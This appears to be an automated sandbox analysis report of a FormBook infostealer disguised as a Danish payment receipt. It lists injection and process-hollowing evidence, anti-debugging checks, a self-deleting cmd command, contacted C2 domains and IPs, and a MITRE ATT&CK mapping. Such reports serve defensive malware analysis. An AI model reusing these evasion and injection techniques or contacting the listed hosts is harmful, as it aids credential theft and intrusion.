Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C14F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C14F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C158EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C93884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C93884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C590AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C30050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C30050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C97016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C97016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C97016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CA41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CC8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C461A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C461A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C435A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C969A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C41DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C41DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C41DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C53D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C93540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C37D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C34120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C9A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C44D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C44D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C44D3B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 1_2_00409B30 LdrLoadDll,

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B7310 SetUnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80
Source: C:\Windows\explorer.exe	Domain query: www.bbyyn10.xyz
Source: C:\Windows\explorer.exe	Domain query: www.chimichael.com
Source: C:\Windows\explorer.exe	Network Connect: 50.87.176.30 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.45.211 80
Source: C:\Windows\explorer.exe	Domain query: www.inkedbreadcompany.com
Source: C:\Windows\explorer.exe	Domain query: www.malatirada.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe	Domain query: www.insularrofioa.xyz
Source: C:\Windows\explorer.exe	Domain query: www.bobazzing.com
Source: C:\Windows\explorer.exe	Network Connect: 35.186.238.101 80
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe	Network Connect: 142.4.98.67 80
Source: C:\Windows\explorer.exe	Domain query: www.finansresultation.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.40.182 80
Source: C:\Windows\explorer.exe	Domain query: www.improvfilmproduction.com
Source: C:\Windows\explorer.exe	Domain query: www.rxgmarket.com
Source: C:\Windows\explorer.exe	Domain query: www.joystoreworld.com
Source: C:\Windows\explorer.exe	Domain query: www.tucows.website
Source: C:\Windows\explorer.exe	Domain query: www.olympiaapartment.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 2A0000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Memory written: C:\Users\user\Desktop\Betalingskvittering.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3440

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Process created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'

Source: explorer.exe, 00000004.00000000.376258618.00000000083EB000.00000004.00000001.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.388804308.0000000000EE0000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.388804308.0000000000EE0000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000004.00000000.388804308.0000000000EE0000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_002C3C49 GetSystemTime,SystemTimeToFileTime,

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Shared Modules1	Valid Accounts1	Valid Accounts1	Valid Accounts1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Access Token Manipulation1	LSASS Memory	Security Software Discovery141	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
